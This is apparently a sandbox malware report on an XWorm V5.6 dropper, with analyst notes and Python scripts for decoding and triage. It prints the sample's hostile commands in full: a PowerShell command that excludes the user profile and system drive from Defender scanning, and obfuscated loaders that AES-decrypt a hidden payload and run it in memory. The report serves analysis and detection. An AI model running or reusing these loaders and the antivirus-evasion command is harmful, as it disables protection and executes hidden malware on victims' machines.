Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 30-06-2024 01:03
Static task: static1
Behavioral task: behavioral1
  Sample: 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
  Resource: win10v2004-20240508-en
General
Target: 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
Size: 15.6MB
MD5: ad3893ee2a8e40f2700236672635f5aa
SHA1: 80f3c0bc398c473e32eeb1420218be6a5feb291d
SHA256: 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727
SHA512: 748db720695d028c034367f0af26d80ced9700dc497a82ce5a4ce578b39fb24c0f869ddbae3b542b15718523fa3cd29c11f78ded0f9f748ac4954256472a4111
SSDEEP: 196608:IZu1YQGj4ZSo3jXkpiliRElNhT7kiibJ488hEipzLmCKg4EFJ9UHytjAIgwX4FVE:+u1OjJEIZulNyHytjma0VvjZ6
Malware Config
Signatures
-
Detects Windows executables referencing non-Windows User-Agents (2 IoCs)
Processes:
resource: \Users\Admin\AppData\Roaming\Xworm V5.6.exe  yara_rule: INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
resource: behavioral1/memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmp  yara_rule: INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
Detects executables (downloaders) containing URLs to raw contents of a paste (2 IoCs)
Processes:
resource: \Users\Admin\AppData\Roaming\Xworm V5.6.exe  yara_rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
resource: behavioral1/memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmp  yara_rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
Detects executables using Telegram Chat Bot (2 IoCs)
Processes:
resource: \Users\Admin\AppData\Roaming\Xworm V5.6.exe  yara_rule: INDICATOR_SUSPICIOUS_EXE_TelegramChatBot
resource: behavioral1/memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmp  yara_rule: INDICATOR_SUSPICIOUS_EXE_TelegramChatBot
Executes dropped EXE (3 IoCs)
Processes:
pid 1752  xworm.bat.exe
pid 2716  xfixer.bat.exe
pid 2492  Xworm V5.6.exe
Loads dropped DLL (3 IoCs)
Processes:
pid 2624  cmd.exe
pid 2636  cmd.exe
pid 3008  1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
pid 1752  xworm.bat.exe
pid 3020  powershell.exe
pid 2716  xfixer.bat.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
Token: SeDebugPrivilege  pid 1752  xworm.bat.exe
Token: SeDebugPrivilege  pid 3020  powershell.exe
Token: SeDebugPrivilege  pid 2716  xfixer.bat.exe
Suspicious use of WriteProcessMemory (27 IoCs)
Processes (identical repeated entries of the original list are collapsed; the last column is how many times each entry appears):
PID 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe wrote to memory of 3020 powershell.exe   4
PID 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe wrote to memory of 2624 cmd.exe          4
PID 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe wrote to memory of 2636 cmd.exe          4
PID 2624 cmd.exe wrote to memory of 1752 xworm.bat.exe   4
PID 2636 cmd.exe wrote to memory of 2716 xfixer.bat.exe  4
PID 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe wrote to memory of 2492 Xworm V5.6.exe   4
PID 2492 Xworm V5.6.exe wrote to memory of 1368 WerFault.exe   3
Every source/target pair above is a parent writing into a child it has just spawned (compare the process tree below), which is what CreateProcess itself does when it sets up the child; this signature is therefore consistent with plain process spawning rather than injection into a foreign process.
Processes
-
Depth 1: C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
-
  Depth 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AdABsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdQBpACMAPgA="
    Note: the command line asks for System32 but the image runs from SysWOW64, so the parent is a 32-bit process and WOW64 file-system redirection applies. The -EncodedCommand value is base64 over UTF-16LE and decodes to: <#ntl#>Add-MpPreference <#wnz#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#puh#> -Force <#gui#>. With the junk <# #> block comments removed this is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which excludes the entire user profile and the whole system drive from Defender scanning before the later stages are written to disk.
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
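Decoding the -EncodedCommand argument shown above is a two-step job (base64, then UTF-16LE) that plain grep and most log searches miss, and the <# ... #> block comments sprinkled through the script exist only to break string signatures. The following Python is an added example written for this page, not code from the sandbox or from the sample; it embeds the encoded string from the process tree as its input, decodes it, strips the junk comments and reports the Defender-tampering cmdlet and the excluded paths. The function names and the DEFENDER_TAMPER table are this example's own (the cmdlet and parameter names in it are real Defender parameters).

```python
import base64
import re

# Constructed sample: the -EncodedCommand argument from the powershell.exe entry
# in the process tree above, copied verbatim from the report.
ENCODED = "PAAjAG4AdABsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdQBpACMAPgA="

BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)

# Defender-tampering cmdlets and the switches worth flagging. The parameter names
# are real Defender cmdlet parameters; the table itself is this example's own.
DEFENDER_TAMPER = {
    "Add-MpPreference": ("-ExclusionPath", "-ExclusionProcess", "-ExclusionExtension"),
    "Set-MpPreference": ("-DisableRealtimeMonitoring", "-DisableBehaviorMonitoring",
                         "-DisableIOAVProtection", "-ExclusionPath"),
}


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 over UTF-16LE text, not UTF-8. Decoding the
    bytes as UTF-8 gives NUL-interleaved characters, which is why a naive
    base64-then-grep pipeline fails to match cmdlet names."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_junk_comments(script: str) -> str:
    """Drop <# ... #> block comments (pure noise here) and collapse the
    whitespace they leave behind so the command reads as one line."""
    return re.sub(r"\s+", " ", BLOCK_COMMENT.sub("", script)).strip()


def triage(b64: str) -> dict:
    """Decode, clean and classify one -EncodedCommand value."""
    raw = decode_encoded_command(b64)
    clean = strip_junk_comments(raw)
    tamper = []
    for cmdlet, switches in DEFENDER_TAMPER.items():
        if re.search(rf"\b{cmdlet}\b", clean, re.IGNORECASE):
            hits = [s for s in switches if s.lower() in clean.lower()]
            tamper.append((cmdlet, hits))
    return {
        "raw": raw,
        "clean": clean,
        "junk_comments": len(BLOCK_COMMENT.findall(raw)),
        "defender_tamper": tamper,
        # exclusion targets are env-var expansions; record them literally
        "excluded_paths": re.findall(r"\$env:\w+", clean),
    }


if __name__ == "__main__":
    for key, value in triage(ENCODED).items():
        print(f"{key}: {value}")
```

For detection, the pairing to alert on is powershell.exe with -EncodedCommand (or -e/-enc) whose decoded text contains Add-MpPreference or Set-MpPreference; the junk-comment trick means the match must run on the decoded and comment-stripped text, not on the raw command line.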
-
  Depth 2: C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c ""C:\Users\Admin\AppData\Roaming\xworm.bat" "
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
-
    Depth 3: C:\Users\Admin\AppData\Roaming\xworm.bat.exe
      Command line: "xworm.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xworm.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
      Note: the arguments (-noprofile -windowstyle hidden -ep bypass -command) are powershell.exe's, which indicates the 442KB xworm.bat.exe dropped next to the batch file is a copy of the PowerShell host under a .bat.exe name. The script reads xworm.bat, takes the first line that starts with ":: @" (a batch comment, so cmd.exe ignores it), strips the junk token _CASH_, base64-decodes the rest, decrypts it with AES-CBC/PKCS7 using the hard-coded key +ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U= and IV /z4iXtMuBf06DnNNej/bVw==, gunzips the plaintext, loads it as a .NET assembly with Assembly.Load and invokes its EntryPoint, so the real payload never touches disk as a PE. Method names are hidden by reversing them: 'txeTllAdaeR' is ReadAllText, 'gnirtS46esaBmorF' is FromBase64String, 'daoL' is Load.
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
-
  Depth 2: C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c ""C:\Users\Admin\AppData\Roaming\xfixer.bat" "
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
-
    Depth 3: C:\Users\Admin\AppData\Roaming\xfixer.bat.exe
      Command line: "xfixer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xfixer.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))
      Note: same loader as xworm.bat.exe, differing only in the stage file (xfixer.bat), the AES key fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ= and the IV +5/SuT9a8EJc5rjsiLxvRg==. Both keys are 32 bytes (AES-256) and both IVs 16 bytes; because they are hard-coded in the command line, the encrypted payload in each .bat can be recovered statically without running anything.
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
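The xworm.bat.exe and xfixer.bat.exe command lines above are the same loader with different keys, and everything needed to recover their payloads is in the command line itself. The Python below is an added example written for this page (not the sandbox's or the sample's code): it undoes the three obfuscation tricks (reversed method names indexed with [-1..-N], the ::('Name') dynamic member call, and the $_CASH_ variable prefix), pulls out the stage file, payload marker, junk token, AES mode/padding, key and IV, and reproduces the loader's own carving step on a batch file. The xworm.bat.exe -command string is embedded verbatim as input; the real xworm.bat is not on this page, so the SAMPLE_BAT used for carving is a constructed stand-in with a dummy blob. Function names are this example's own. AES decryption and gunzip of the carved bytes are deliberately left to a separate tool in an offline VM.

```python
import base64
import re

# The -command argument of the xworm.bat.exe entry in the process tree above,
# copied verbatim; used here as the sample input.
XWORM_CMD = r"""$_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xworm.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))"""

# Constructed stand-in for xworm.bat (the real file is not on this page): a
# payload line with the ":: @" marker and a dummy base64 blob carrying one
# junk "_CASH_" token, exactly the shape the loader expects.
SAMPLE_BAT = "@echo off\r\n:: @AAAA_CASH_BBBB\r\necho done\r\n"

REVERSED_STR = re.compile(r"'([^']*)'\[-1\.\.-(\d+)\]\s*-join\s*''")
DYNAMIC_MEMBER = re.compile(r"::\('([A-Za-z_]\w*)'\)")


def deobfuscate(cmd: str, prefix: str = "_CASH_") -> str:
    """Undo the loader's string tricks:
    1. 'gnirtS'[-1..-N] -join ''  -> the string reversed (PowerShell negative
       range indexing walks the last N characters backwards),
    2. [Type]::('Name')(...)       -> [Type]::Name(...), the dynamic member
       syntax that keeps FromBase64String/Load out of the visible text,
    3. $_CASH_xxxx                 -> $xxxx, the junk variable prefix."""
    def unreverse(m: re.Match) -> str:
        s, n = m.group(1), int(m.group(2))
        return "'" + s[-n:][::-1] + "'"
    out = REVERSED_STR.sub(unreverse, cmd)
    out = DYNAMIC_MEMBER.sub(r"::\1", out)
    return out.replace("$" + prefix, "$")


def extract_loader_config(cmd: str) -> dict:
    """Pull the static decryption parameters out of a deobfuscated loader."""
    clean = deobfuscate(cmd)

    def grab(pattern: str):
        m = re.search(pattern, clean)
        return m.group(1) if m else None

    key_b64 = grab(r"\.Key = \[System\.Convert\]::FromBase64String\('([^']+)'\)")
    iv_b64 = grab(r"\.IV = \[System\.Convert\]::FromBase64String\('([^']+)'\)")
    return {
        "deobfuscated": clean,
        "stage_file": grab(r"ReadAllText\('([^']+)'\)"),
        "payload_marker": grab(r"StartsWith\('([^']+)'\)"),
        "junk_token": grab(r"Regex\]::Replace\(\$\w+, '([^']+)', ''\)"),
        "aes_mode": grab(r"CipherMode\]::(\w+)"),
        "padding": grab(r"PaddingMode\]::(\w+)"),
        "aes_key": base64.b64decode(key_b64) if key_b64 else None,
        "aes_iv": base64.b64decode(iv_b64) if iv_b64 else None,
        "gzip": "GZipStream" in clean,
        "in_memory_assembly_load": "[System.Reflection.Assembly]::Load(" in clean,
    }


def carve_payload(bat_text: str, marker: str, junk_token: str) -> bytes:
    """Mirror the loader's carving: the first line beginning with `marker` (a
    batch comment, ignored by cmd.exe) holds the payload; junk tokens are
    removed and the remainder base64-decoded. The result is AES-CBC ciphertext:
    decrypt it with the extracted key/IV (PKCS7), gunzip, and a .NET PE
    starting with 'MZ' should come out."""
    for line in bat_text.splitlines():
        if line.startswith(marker):
            return base64.b64decode(line[len(marker):].replace(junk_token, ""))
    raise ValueError("no payload line found")


if __name__ == "__main__":
    cfg = extract_loader_config(XWORM_CMD)
    print(cfg["deobfuscated"])
    print("stage:", cfg["stage_file"], "key bytes:", len(cfg["aes_key"]), "iv bytes:", len(cfg["aes_iv"]))
    print("carved ciphertext:", carve_payload(SAMPLE_BAT, cfg["payload_marker"], cfg["junk_token"]).hex())
```

Run it against the xfixer.bat.exe command line by swapping the input string; the only differences are the stage file name and the key/IV. The same regexes also work as a triage rule: a PowerShell command line that contains both `[-1..-` string reversal and `AesManaged` plus `Assembly]::` is this loader family regardless of the variable prefix chosen.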
-
  Depth 2: C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe
    Command line: "C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
-
    Depth 3: C:\Windows\system32\WerFault.exe
      Command line: C:\Windows\system32\WerFault.exe -u -p 2492 -s 732
      Note: this is Windows Error Reporting being invoked for pid 2492 (Xworm V5.6.exe), i.e. that process crashed in the win7 run; the three YARA hits on it (non-Windows User-Agent, raw-paste URL, Telegram bot) come from the file and its memory dump, not from observed network activity.
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Roaming\xfixer.bat
Filesize: 304KB
MD5: 28a668375e0d2b1cfa1d847fc44934d4
SHA1: bd0d7df2f07f879e97e02d13d9eebf0a584fabe7
SHA256: cc3de81425f13eba2412c152f843351307b3d7f3cb9bd2da3d577ec5e36f8160
SHA512: d35dd9fd930f84f5cf1b042c828b6d2adc3007ff0042153f5f7fd45f8539f4155df8b07f59fe488ab3a03f2af4f8067b56c7276b3c80d3554d02ed930470689c
-
C:\Users\Admin\AppData\Roaming\xworm.bat
Filesize: 317KB
MD5: ada0b01d33911547bb0086e0ed152484
SHA1: ec81374c631f94c536b51dfb8c42c063bf72ca78
SHA256: aba89066a3bbc1addaaa48b4d209dac1e59138afb64c797bf950d286e8e826a1
SHA512: 6aba80c863169fe3a244e20c6d9cfc13f8f69ff81a8402327603f46700a2798d19d1347f0c34e9301cac9aeec0ae5ae9adc76f571dddb9fdbfac6c23de3aae26
-
C:\Users\Admin\AppData\Roaming\xworm.bat.exe
Filesize: 442KB
MD5: 92f44e405db16ac55d97e3bfe3b132fa
SHA1: 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256: 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512: f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
\Users\Admin\AppData\Roaming\Xworm V5.6.exe
Filesize: 14.9MB
MD5: 56ccb739926a725e78a7acf9af52c4bb
SHA1: 5b01b90137871c3c8f0d04f510c4d56b23932cbc
SHA256: 90f58865f265722ab007abb25074b3fc4916e927402552c6be17ef9afac96405
SHA512: 2fee662bc4a1a36ce7328b23f991fa4a383b628839e403d6eb6a9533084b17699a6c939509867a86e803aafef2f9def98fa9305b576dad754aa7f599920c19a1
-
memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmp
Filesize: 14.9MB